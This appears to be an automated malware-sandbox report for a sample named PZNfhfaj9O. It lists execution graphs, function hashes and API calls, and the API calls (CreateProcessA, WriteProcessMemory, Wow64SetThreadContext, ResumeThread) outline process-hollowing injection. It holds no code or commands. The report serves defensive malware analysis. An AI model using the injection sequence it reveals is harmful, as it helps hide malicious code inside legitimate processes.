                                                                                execution_graph 29121 1400871 29126 1400817 29121->29126 29132 14008d8 29121->29132 29137 14008c8 29121->29137 29122 1400889 29128 140081d 29126->29128 29127 1400897 29127->29122 29128->29127 29142 1400ce0 29128->29142 29146 1400ce8 29128->29146 29129 140093e 29129->29122 29133 14008fa 29132->29133 29135 1400ce0 GetConsoleWindow 29133->29135 29136 1400ce8 GetConsoleWindow 29133->29136 29134 140093e 29134->29122 29135->29134 29136->29134 29138 14008d8 29137->29138 29140 1400ce0 GetConsoleWindow 29138->29140 29141 1400ce8 GetConsoleWindow 29138->29141 29139 140093e 29139->29122 29140->29139 29141->29139 29143 1400ce8 GetConsoleWindow 29142->29143 29145 1400d56 29143->29145 29145->29129 29147 1400d26 GetConsoleWindow 29146->29147 29149 1400d56 29147->29149 29149->29129 29103 67d6361 29104 67d62fc 29103->29104 29105 67d636a 29103->29105 29109 67d73f1 29104->29109 29113 67d7400 29104->29113 29106 67d631d 29110 67d738d 29109->29110 29110->29109 29111 67d7451 29110->29111 29117 67d6f98 29110->29117 29111->29106 29115 67d7448 29113->29115 29114 67d7451 29114->29106 29115->29114 29116 67d6f98 LoadLibraryW 29115->29116 29116->29114 29118 67d75f0 LoadLibraryW 29117->29118 29120 67d7665 29118->29120 29120->29111

                                                                                Executed Functions

                                                                                Function 067D75E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986060031.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67d0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7dc9e37aada489c74584f129de33e2f49167597fbf427680186a61230091552e
                                                                                • Instruction ID: 051ef4e2646b60f8b9f69436bfd5b80e4f16ea828935c00965ce974184152409
                                                                                • Opcode Fuzzy Hash: 7dc9e37aada489c74584f129de33e2f49167597fbf427680186a61230091552e
                                                                                • Instruction Fuzzy Hash: E41126B5C002498FDB20DF9AC844ADEFBF9EF88320F14842AD419A7610D779A546CFA5
                                                                                Function 067D6F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986060031.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67d0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 721a2a859c4989b9bbba03df476c6ff75d3bfd86b187422facd23f4392466b48
                                                                                • Instruction ID: e9d8007980197f40880de5d6e8ff5beb4a79194f3c6415055896d86189367c4d
                                                                                • Opcode Fuzzy Hash: 721a2a859c4989b9bbba03df476c6ff75d3bfd86b187422facd23f4392466b48
                                                                                • Instruction Fuzzy Hash: A11123B5C007498FDB24DF9AC844A9EFBF4EF88220F14882AD419B7200E779A545CFA5
                                                                                Function 01400CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974667412.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1400000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 96325511d23e7571073ea51cb0b66938ca823ac1f9012fcf4be2595b0b4dff84
                                                                                • Instruction ID: 0ff8e16f1ea35274d1762768deb15e14ee2a4364bd0b1d96cc5e63dbd6049482
                                                                                • Opcode Fuzzy Hash: 96325511d23e7571073ea51cb0b66938ca823ac1f9012fcf4be2595b0b4dff84
                                                                                • Instruction Fuzzy Hash: B41158719003488FDB24DFAAC4457DEBBF4EF88324F20882AD019A7250CB39A941CFA4
                                                                                Function 01400CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974667412.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1400000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 327efbdce3abdb2b3cad9413ab5b16b2930e19c4f34fc866e109c01f522f30b5
                                                                                • Instruction ID: 9b4f2765603dea1bfe95805c9d902d0fa5e1817e4efa21705add6d427933659c
                                                                                • Opcode Fuzzy Hash: 327efbdce3abdb2b3cad9413ab5b16b2930e19c4f34fc866e109c01f522f30b5
                                                                                • Instruction Fuzzy Hash: E7113671D002498FDB20DFAAC44579FFFF8EF48324F14881AD419A7250CB79A540CBA5
                                                                                Function 06821550 Relevance: 1.4, Instructions: 1414COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82c2b2d2be4775966e079d7103536d00b9254ea37bc1bbbeae70b60811ebb5ff
                                                                                • Instruction ID: 74e22e3791b026dd7c854271eaec99b68c09890cc6460e064996b4a7ffe4f7c5
                                                                                • Opcode Fuzzy Hash: 82c2b2d2be4775966e079d7103536d00b9254ea37bc1bbbeae70b60811ebb5ff
                                                                                • Instruction Fuzzy Hash: E2C24074B002189FCB65DB59C891EAEB7B2FF88704F108199E605AB361DB71ED81CF51
                                                                                Function 0682349D Relevance: 1.3, Instructions: 1278COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6003d79082cee520b5d70699218cac4180197bf36c76533f2c02e9a6763f313d
                                                                                • Instruction ID: 927bbef90fd64d263abbe230e2b442811c4ff8f96336be4c26e7ff43e1402e3f
                                                                                • Opcode Fuzzy Hash: 6003d79082cee520b5d70699218cac4180197bf36c76533f2c02e9a6763f313d
                                                                                • Instruction Fuzzy Hash: EBA1DD74B002559FCB44DF68C8A4A6EBBF6EF88314B10856AE616DB3A2CB35DC41CB51
                                                                                Function 06820048 Relevance: .7, Instructions: 665COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: db5b323587a72ede0457fdff8e96d805083a4b8b6d63adebc6714f682c808af0
                                                                                • Instruction ID: d5098071c3ec25ee3900a63f66ddfdcb618900e448cccde5e3da5d24ba2f67c5
                                                                                • Opcode Fuzzy Hash: db5b323587a72ede0457fdff8e96d805083a4b8b6d63adebc6714f682c808af0
                                                                                • Instruction Fuzzy Hash: B94289B07006298FDB64EF79C49066EBBB2FBC5304B514A5DD5039F391DBB6A8058B82
                                                                                Function 068219C8 Relevance: .6, Instructions: 570COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6223f62270e1f3c44bb88072d34a9eaf8e110a0a3eab70111af80e9e1b00a33c
                                                                                • Instruction ID: d47c5e6c249f1d5cc2f6452e36e790c4b43ee46a508d6c7289abdf6b75a989ad
                                                                                • Opcode Fuzzy Hash: 6223f62270e1f3c44bb88072d34a9eaf8e110a0a3eab70111af80e9e1b00a33c
                                                                                • Instruction Fuzzy Hash: 01224178B002148FD768DB15C9A1EAEB3B6FB88704F108195EA0A9F751DB71ED818F91
                                                                                Function 06821533 Relevance: .3, Instructions: 334COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2467f2fbae82a438af1f94243a34923c01f10a465dbc90433d1e0cea76ed1189
                                                                                • Instruction ID: c5ff65af74c24feebd8e0812ea2e03bcc55df56fa84ad4d6453615c60f6d7f49
                                                                                • Opcode Fuzzy Hash: 2467f2fbae82a438af1f94243a34923c01f10a465dbc90433d1e0cea76ed1189
                                                                                • Instruction Fuzzy Hash: C6C13C34B10104AFCB44DF58C998E9EBBB2FF89704F618159EA05EF761CA72EC558B11
                                                                                Function 06820000 Relevance: .3, Instructions: 330COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3f8f24a086a65dad2308f7dd5bad2c62bb9d4998657f37a6ad7be652f7c00b26
                                                                                • Instruction ID: ba69c80f63454d064ef7c92fb12b6b4a86023e056664b7e7b2d8f1ebfe383783
                                                                                • Opcode Fuzzy Hash: 3f8f24a086a65dad2308f7dd5bad2c62bb9d4998657f37a6ad7be652f7c00b26
                                                                                • Instruction Fuzzy Hash: 30D1AF70B04255CFEB41CFA5C851A6EBBB2FF89304F14859AE602DF3A2DB719845CB91
                                                                                Function 06820047 Relevance: .3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67da9ced7c70b2f6ab46b2f7a11a438ac48664eddfba5cb01b56474bb829f3aa
                                                                                • Instruction ID: 0230215609016bbc384447894a0ffbfe86d90e6cfcef86059612b65add550c65
                                                                                • Opcode Fuzzy Hash: 67da9ced7c70b2f6ab46b2f7a11a438ac48664eddfba5cb01b56474bb829f3aa
                                                                                • Instruction Fuzzy Hash: B7C17F70B00219DFEB50DFA5C855A6E7BB2FF88704F10855AE6029F3A2DBB1D845CB91
                                                                                Function 06821308 Relevance: .2, Instructions: 200COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dba598f11e922fe500b6d9a6b446bf6bfe1ed149c3f21bba21890e536f8faaea
                                                                                • Instruction ID: ae08f45d2111211d4b0bd63ae438c9d3576a0ab6db1d989a9291b75c7afba4c0
                                                                                • Opcode Fuzzy Hash: dba598f11e922fe500b6d9a6b446bf6bfe1ed149c3f21bba21890e536f8faaea
                                                                                • Instruction Fuzzy Hash: 9D514C32B046668FCB619A7D844856EBBA7EFC1214B24847EDB85CB251EB35C885C391
                                                                                Function 0682338B Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d48bd3ef7ff026ffeb32fe2f5d97c33896bef1c2ee21ea21215fc20c41a77711
                                                                                • Instruction ID: 931b9f055ed557763133c6565df00891de7258cb9991592cb37f1042b459630b
                                                                                • Opcode Fuzzy Hash: d48bd3ef7ff026ffeb32fe2f5d97c33896bef1c2ee21ea21215fc20c41a77711
                                                                                • Instruction Fuzzy Hash: 95213735B001159FCB54CF69D894EAEBBA2EF88714F1180A9FA059F3A2DA31ED41CB50
                                                                                Function 013AD054 Relevance: .1, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974428041.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13ad000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 82a416c65627831fcf4ef3b37d2419d8ed8f47a7e43aebe30f683421148570cb
                                                                                • Instruction ID: 9d52d41c8dceeaedc9feeb623a59f6a4695767f985e1258b909fad179f3a4dfd
                                                                                • Opcode Fuzzy Hash: 82a416c65627831fcf4ef3b37d2419d8ed8f47a7e43aebe30f683421148570cb
                                                                                • Instruction Fuzzy Hash: 9E212872504244DFDF15DF94D8C0B26BFA5FB88318F64C669EA090BA56C33AD416CBA1
                                                                                Function 013BD2F4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974476059.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13bd000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b826ce1cfcf5c547ea0bf6c7bcd72ec47556274dbe49295bda82af20e29c1189
                                                                                • Instruction ID: 51c77f72885080ba5748e24d77f1b42ac9996e04caf6bd4f5a082cb1f992bc26
                                                                                • Opcode Fuzzy Hash: b826ce1cfcf5c547ea0bf6c7bcd72ec47556274dbe49295bda82af20e29c1189
                                                                                • Instruction Fuzzy Hash: 132126B1605244DFDB01DF58D4C0B6ABBA9FB8831CF24C569DA4D4BA47D33AD406CAA1
                                                                                Function 013BD4A4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974476059.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13bd000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 68affbe399753cf8f80994c6d9ce0d6e436152aa35352ca1142e6dc6830b810d
                                                                                • Instruction ID: ed73e57f009ba5ad9f4eddc235ddce8ee5f833a9bc794e647a835bfb0440422b
                                                                                • Opcode Fuzzy Hash: 68affbe399753cf8f80994c6d9ce0d6e436152aa35352ca1142e6dc6830b810d
                                                                                • Instruction Fuzzy Hash: 172137B1504204DFDB01CF58C5C0B66BBA5FB8831CF24C96EDA094BA52D73AD406CB61
                                                                                Function 013AD04F Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974428041.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13ad000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction ID: 1b055a74914f9cf432dc758f06abfb7a9fd0d48bd6b274b9f0220eb5ff27e666
                                                                                • Opcode Fuzzy Hash: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction Fuzzy Hash: 9321DF76404280DFDF16CF44D9C0B16BF72FB88318F2486A9E9490B657C33AE426CB91
                                                                                Function 013BD2EF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974476059.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13bd000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction ID: 48fce695704d5c1b6428ad443aceefc4cbff04d37da2a6966256e12d4ccc0da3
                                                                                • Opcode Fuzzy Hash: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction Fuzzy Hash: EF119D76505280CFDB12CF54D5C4B59BF61FB84328F28C6AAD94D4BA57C33AD40ACBA2
                                                                                Function 013BD49F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974476059.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13bd000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: b696a3dd485751cf0aaa8259bd6323c38e7a918b3598fdcb9adcc6390d255e6b
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 5611DD75504284CFDB02CF58C5C4B15BFA1FB8431CF24C6AADA494B666C33AD40ACB62
                                                                                Function 06821440 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 01e6cedb79823c03b0ed3b3bf0abf4a66a14d9b09aab98b9ed3c7a85f9e60e3b
                                                                                • Instruction ID: 039f8f274d8e228556892e4a628a58c4518acb69631df071cf0da2f8bb043e07
                                                                                • Opcode Fuzzy Hash: 01e6cedb79823c03b0ed3b3bf0abf4a66a14d9b09aab98b9ed3c7a85f9e60e3b
                                                                                • Instruction Fuzzy Hash: 5F01F035E1071B8ACB60BE7995840BEB7B5AE81214B154536DF8D97111FB30C6D4C761
                                                                                Function 013ADAF9 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974428041.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13ad000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3ef0854498ff7401959029e0ed9184bf1d60055ce6565e0c3494f6ed821de164
                                                                                • Instruction ID: 06982364fbe619e39fd373a8dfd176caf2554c0ccf339f08bd6484eb2d4e405e
                                                                                • Opcode Fuzzy Hash: 3ef0854498ff7401959029e0ed9184bf1d60055ce6565e0c3494f6ed821de164
                                                                                • Instruction Fuzzy Hash: 2B012B711043449EE7208B5ACC84B66FFACDF45328F48C81AED090F986C2799840CAB1
                                                                                Function 013ADAF8 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974428041.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13ad000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1b342b91b9fc61d9da1c178a01d202c27ae80eab9ba0d48d3a55ffbef79082e
                                                                                • Instruction ID: 2ee0edc26a7019b034e3577c4904cf1c0703eb2cc538647723a8bfc22d6a2202
                                                                                • Opcode Fuzzy Hash: e1b342b91b9fc61d9da1c178a01d202c27ae80eab9ba0d48d3a55ffbef79082e
                                                                                • Instruction Fuzzy Hash: 93F0C232004340AEEB218E0ADC84B62FFA8EB41634F18C45AED084B286C2799844CAB1

                                                                                Non-executed Functions

                                                                                Function 06820D50 Relevance: 10.3, Strings: 8, Instructions: 299COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                • API String ID: 0-3970889292
                                                                                • Opcode ID: ca565bdd8cfb364490995b8df0deefcd8b5b0669d7764dba76d4ab735151f037
                                                                                • Instruction ID: 135308ff171e38b9ed0dad23737107e32cbbc53027d47363a0a7b670d11ae3b6
                                                                                • Opcode Fuzzy Hash: ca565bdd8cfb364490995b8df0deefcd8b5b0669d7764dba76d4ab735151f037
                                                                                • Instruction Fuzzy Hash: CAB1E034B0425A9FCB55DB69C84497EBBF2FF88300B14806AE506CB3A1DB71DC81CB90

                                                                                Execution Graph

                                                                                Execution Coverage:9.6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:175
                                                                                Total number of Limit Nodes:12
                                                                                execution_graph 28295 2c8d458 28296 2c8d49e 28295->28296 28300 2c8d638 28296->28300 28303 2c8d627 28296->28303 28297 2c8d58b 28302 2c8d666 28300->28302 28306 2c8b7b0 28300->28306 28302->28297 28304 2c8b7b0 DuplicateHandle 28303->28304 28305 2c8d666 28304->28305 28305->28297 28307 2c8d6a0 DuplicateHandle 28306->28307 28309 2c8d736 28307->28309 28309->28302 28324 2c84668 28325 2c8467a 28324->28325 28326 2c84686 28325->28326 28328 2c84781 28325->28328 28329 2c847a5 28328->28329 28333 2c84890 28329->28333 28337 2c84881 28329->28337 28334 2c848b7 28333->28334 28335 2c84994 28334->28335 28341 2c844b4 28334->28341 28338 2c848b7 28337->28338 28339 2c84994 28338->28339 28340 2c844b4 CreateActCtxA 28338->28340 28340->28339 28342 2c85920 CreateActCtxA 28341->28342 28344 2c859e3 28342->28344 28310 2c8acd0 28311 2c8acdf 28310->28311 28314 2c8adc8 28310->28314 28319 2c8adc7 28310->28319 28315 2c8adfc 28314->28315 28316 2c8add9 28314->28316 28315->28311 28316->28315 28317 2c8b000 GetModuleHandleW 28316->28317 28318 2c8b02d 28317->28318 28318->28311 28320 2c8adfc 28319->28320 28321 2c8add9 28319->28321 28320->28311 28321->28320 28322 2c8b000 GetModuleHandleW 28321->28322 28323 2c8b02d 28322->28323 28323->28311 28123 717bb1c 28128 717d80e 28123->28128 28144 717d7a8 28123->28144 28159 717d799 28123->28159 28124 717baab 28129 717d79c 28128->28129 28131 717d811 28128->28131 28130 717d788 28129->28130 28174 717de76 28129->28174 28179 717deee 28129->28179 28185 717dde2 28129->28185 28189 717dc44 28129->28189 28194 717de38 28129->28194 28199 717e11a 28129->28199 28204 717dcbb 28129->28204 28209 717df7c 28129->28209 28218 717dedc 28129->28218 28223 717df3f 28129->28223 28229 717e095 28129->28229 28233 717e0d6 28129->28233 28130->28124 28131->28124 28145 717d7c2 28144->28145 28146 717d7ca 28145->28146 28147 717de76 2 API calls 28145->28147 28148 717e0d6 2 API calls 28145->28148 28149 717e095 2 API calls 28145->28149 28150 717df3f 2 API calls 28145->28150 28151 717dedc 2 API calls 28145->28151 28152 717df7c 4 API calls 28145->28152 28153 717dcbb 2 API calls 28145->28153 28154 717e11a 2 API calls 28145->28154 28155 717de38 2 API calls 28145->28155 28156 717dc44 2 API calls 28145->28156 28157 717dde2 2 API calls 28145->28157 28158 717deee 2 API calls 28145->28158 28146->28124 28147->28146 28148->28146 28149->28146 28150->28146 28151->28146 28152->28146 28153->28146 28154->28146 28155->28146 28156->28146 28157->28146 28158->28146 28160 717d79c 28159->28160 28161 717d788 28160->28161 28162 717de76 2 API calls 28160->28162 28163 717e0d6 2 API calls 28160->28163 28164 717e095 2 API calls 28160->28164 28165 717df3f 2 API calls 28160->28165 28166 717dedc 2 API calls 28160->28166 28167 717df7c 4 API calls 28160->28167 28168 717dcbb 2 API calls 28160->28168 28169 717e11a 2 API calls 28160->28169 28170 717de38 2 API calls 28160->28170 28171 717dc44 2 API calls 28160->28171 28172 717dde2 2 API calls 28160->28172 28173 717deee 2 API calls 28160->28173 28161->28124 28162->28161 28163->28161 28164->28161 28165->28161 28166->28161 28167->28161 28168->28161 28169->28161 28170->28161 28171->28161 28172->28161 28173->28161 28175 717de83 28174->28175 28237 717ad10 28175->28237 28241 717ad18 28175->28241 28176 717e41d 28181 717def4 28179->28181 28180 717e644 28181->28180 28183 717ad10 ResumeThread 28181->28183 28184 717ad18 ResumeThread 28181->28184 28182 717e41d 28183->28182 28184->28182 28245 717b480 28185->28245 28249 717b488 28185->28249 28186 717dca3 28186->28130 28190 717dc4a 28189->28190 28253 717b614 28190->28253 28257 717b620 28190->28257 28195 717de3c 28194->28195 28261 717adc0 28195->28261 28265 717adc8 28195->28265 28196 717dd35 28200 717e12a 28199->28200 28269 717b390 28200->28269 28273 717b398 28200->28273 28201 717e394 28205 717dcc1 28204->28205 28207 717b390 WriteProcessMemory 28205->28207 28208 717b398 WriteProcessMemory 28205->28208 28206 717dcf3 28206->28130 28207->28206 28208->28206 28210 717df92 28209->28210 28211 717dcd2 28210->28211 28277 717b2d3 28210->28277 28281 717b2d8 28210->28281 28212 717e5ee 28211->28212 28216 717b390 WriteProcessMemory 28211->28216 28217 717b398 WriteProcessMemory 28211->28217 28213 717dcf3 28213->28130 28216->28213 28217->28213 28219 717de3c 28218->28219 28220 717dd35 28218->28220 28221 717adc0 Wow64SetThreadContext 28219->28221 28222 717adc8 Wow64SetThreadContext 28219->28222 28221->28220 28222->28220 28224 717dcd2 28223->28224 28225 717e5ee 28224->28225 28227 717b390 WriteProcessMemory 28224->28227 28228 717b398 WriteProcessMemory 28224->28228 28226 717dcf3 28226->28130 28227->28226 28228->28226 28285 717e961 28229->28285 28290 717e970 28229->28290 28230 717e0ad 28235 717b390 WriteProcessMemory 28233->28235 28236 717b398 WriteProcessMemory 28233->28236 28234 717e0fa 28235->28234 28236->28234 28238 717ad18 ResumeThread 28237->28238 28240 717ad89 28238->28240 28240->28176 28242 717ad58 ResumeThread 28241->28242 28244 717ad89 28242->28244 28244->28176 28246 717b4e5 ReadProcessMemory 28245->28246 28248 717b486 28245->28248 28247 717b517 28246->28247 28247->28186 28248->28246 28250 717b4d3 ReadProcessMemory 28249->28250 28252 717b517 28250->28252 28252->28186 28254 717b620 CreateProcessA 28253->28254 28256 717b86b 28254->28256 28258 717b6a9 CreateProcessA 28257->28258 28260 717b86b 28258->28260 